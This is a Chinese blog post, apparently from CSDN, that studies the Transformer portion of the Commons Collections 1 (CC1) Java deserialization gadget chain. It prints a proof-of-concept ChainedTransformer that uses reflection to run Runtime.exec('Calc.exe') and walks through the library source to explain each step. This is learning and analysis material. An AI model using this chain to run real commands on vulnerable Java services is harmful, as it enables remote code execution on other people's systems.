java cc1链Transform

最新推荐文章于 2024-11-03 11:01:20 发布
最新推荐文章于 2024-11-03 11:01:20 发布
阅读量366 收藏 10
点赞数 8
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135364647
版权

java cc1链Transform

参考
白日梦组长
先知社区
王嘟嘟

环境搭建 按照先知社区的链接搭建环境即可,注意事项 oracle官网可能会出现版本和下载不对应(刷新几次或者更换vpn),openjdk显示502(更换vpn或者过一段时间在访问即可),添加源路径后仍是class反编译(看修改的源路径是否为对应jdk版本路径下),下载对应版本jdk后,在对应路径安装完运行环境后,即可暂停java安装程序的运行,毕竟只需要jdk环境。

建议先看完白日梦组长的反序列化基础视频,然后再看cc链1即可,本篇只分析poc的运行。

poc

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"Calc.exe"}),
};
Transformer transformerChain = new ChainedTransformer(transformers);
transformerChain.transform(Object.class)

打断点进行调试,首先进入ChainedTransformer方法

public ChainedTransformer(Transformer[] transformers) {
    super();
    iTransformers = transformers;
}

ChainedTransformer接受一个Transformer数组,并赋值给iTransformers,进入ChainedTransformer.transform方法

public Object transform(Object object) {
    for (int i = 0; i < iTransformers.length; i++) {
        object = iTransformers[i].transform(object);
    }
    return object;
}

这里获取iTransformers的值进行递归调用,iTransformers的值为上文数组中的内容,

new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null, null}),
new InvokerTransformer("exec",new Class[]{String.class},new String[]{"Calc.exe"}),

那么ChainedTransformer.transform方法就变为了

object = new ConstantTransformer(Runtime.class).transform(object)
object = new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[]{"getRuntime", null}).transform(object)
object = new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null, null}).transform(object)
object = new InvokerTransformer("exec",new Class[]{String.class},new String[]{"Calc.exe"}).transform(object)

进入ConstantTransformerConstantTransformer.transform方法

public ConstantTransformer(Object constantToReturn) {
    super();
    iConstant = constantToReturn;
}

public Object transform(Object input) {
    return iConstant;
}

接受参数,返回原本参数,运行完之后,这里的Object.class变为了Runtime.class,然后进入InvokerTransformerInvokerTransformer.transform方法中

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }

    public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        Class cls = input.getClass();
        Method method = cls.getMethod(iMethodName, iParamTypes);
        return method.invoke(input, iArgs);

InvokerTransformer方法接受string参数,class数组,object数组,由于ConstantTransformer.transform方法运行完之后,已经把这里的input变为Runtime.class,进入InvokerTransformer.transform方法执行正常的反射调用进而执行命令,
正常的反射方法,这里是因为getRuntime无法进行序列化操作,使用反射调用getRuntime

Class r=Runtime.class;
Method a=r.getMethod("getRuntime",null);
Runtime b= (Runtime) a.invoke(null,null);
Method c=r.getMethod("exec",String.class);
c.invoke(b,"calc");

但实际上InvokerTransformer.transform中的method.invoke(input, iArgs)不是之前的cls而是input

Class cls = input.getClass();
Method method = cls.getMethod(iMethodName, iParamTypes);
method.invoke(input, iArgs)

反射在这里可以理解为,在input类里运行iMethodName,传递的参数为iArgs
传入的为Runtime.class,实际上的运行程序为

    Class a= Runtime.class;
    Class b=a.getClass();
    Method method = b.getMethod("getMethod",String.class, Class[].class);
    Object diyiceng = method.invoke(a,  "getRuntime",null);
    Class c=diyiceng.getClass();
    Method method1 =c.getMethod("invoke",Object.class, Object[].class);
    Object dierceng = method1.invoke(diyiceng,  null,null);
    Class d=dierceng.getClass();
    Method method2 =d.getMethod("exec",String.class);
    method2.invoke(dierceng,  "calc");
天下是个小趴菜
关注
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2389
Commons Collections 1的基本知识
cc1 transform
lylong0703的博客
02-12 3378
cc1 transform 一步一步寻找利用1.找到利用终点2.寻找transform3.进入TransformedMap3.寻找setValue一些小问题 上个大图 成功反序列化 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 poc package org.example.cc.cc1; import org.apache.commons.collections.Tra
java-CC1 条审计
LINGX5的博客
09-18 979
我过程写的很简洁,因为我们在上帝视角来看这条条,没有真正审计时候的迷茫和一些心理的煎熬。而笔记的主要作用也是帮助我们可以串思路,能够想起这个条的几个转折点够了MapEntry 的 setValue()方法,因为``TransformedMap.decorate()方法获取的对象是Map类,而Map类是的父类,他不能调用子类的checkSetValue()`方法。
java反序列化——CC1
DamnVanish的博客
08-27 1199
完整的子追踪起来还是挺复杂的,里面很多地方也都只是浅尝而止,基础还是不牢固反射机制还学的不太明白。 等多看几条子就老实了。。。
Java安全 CC1分析
Elite的博客
01-20 1873
Commons Collections:Java中有一个Collections包,内部封装了许多方法用来对集合进行处理,CommonsCollections则是对Collections进行了补充,完善了更多对集合处理的方法,大大提高了性能。
JavaSec 基础之 CC1
akdelt的博客
03-11 516
调用了 checkSetValue。而且它是 TransformedMap 的父类。
CC1-Transformer利用分析
06-29 778
JDK 8u65环境配置参考。
Java反序列化之CC1分析
热门推荐
混子
12-17 1万+
可能之前看Java CC1的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1和那两种玩法
java反序列化 cc1 分析
m0_64815693的博客
04-17 1355
java反序列化 cc1 分析
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3666
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
JAVA反序列化CC1分析
Re_ly0n的博客
03-26 5634
反序列化的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列化,如果某一个类没有继承serialize类并在一条利用中所需要的地方,我们就可以通过反射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过反射来进行序列化和反序列化,反射核心代码如下 上面的代码都是可以成功弹出计算器的。利用的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析
qq_35976649的博客
04-06 4388
cc1(jdk6) 简化cc1-仿 使用p牛的简化cc1进行分析: package ysoserial.payloads; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import
HashMap为什么线程不安全?
最新发布
rnnf_yyds的博客
11-03 298
HashMap底层是基于数组 + 表(在 Java 8 以后,当表长度超过一定阈值时会转换为红黑树)的数据结构。在多线程环境下,当多个线程同时对HashMap进行put操作时,可下面这种情况:假设两个线程 A 和 B 同时执行put操作,它们计算出的插入位置相同(假设为index线程 A 先获取到了当前index位置的节点,在它还没来得及将新节点插入表(或树)时,线程 B 也获取到了这个位置的节点。
[自用,更新自day5]瑞吉外卖代码及笔记
lapiii的博客
11-01 828
当使用ThreadLocal维护变量时,ThreadLocal为每个使用该变量的线程提供独立的变量副本,所以每一个线程都可以独立地改变自己的副本,而不会影响其它线程所对应的副本。Mybatis Plus公共字段自动填充,也就是在插入或者更新的时候为指定字段赋予指定的值,使用它的好处就是可以统一对这些字段进行处理,避免了重复代码。因为在分页查询的Dish的records(菜品记录中),只有这个菜品所属的categoryId,但是我们需要分页的时候展示的是菜品名字。
基于vue框架的的汇生活家居商城的设计与实现bdjlq(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
10-29 1394
项目功能:商品分类,商品信息,用户。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 905
在现代软件开发中,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库中,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库中。在Java中,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
SpringSession源码分析
lkr_lkr的博客
11-01 273
默认对常规Session的理解和使用,如何使用Set-Cookie。
spring6 笔记(3 万字详解)
2301_79083000的博客
10-29 1287
尚硅谷spring笔记带你一套掌握spring
函数式接口与回调函数实践
m0_37635053的博客
10-29 412
函数式接口与回调函数
java transform
09-21
Javatransform操作可以用于对集合中的元素进行转换。在Java中,我们可以使用Stream API来实现transform操作。通过使用map方法,我们可以定义一个函数来对集合中的每个元素进行转换。 下面是一个示例代码,展示了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值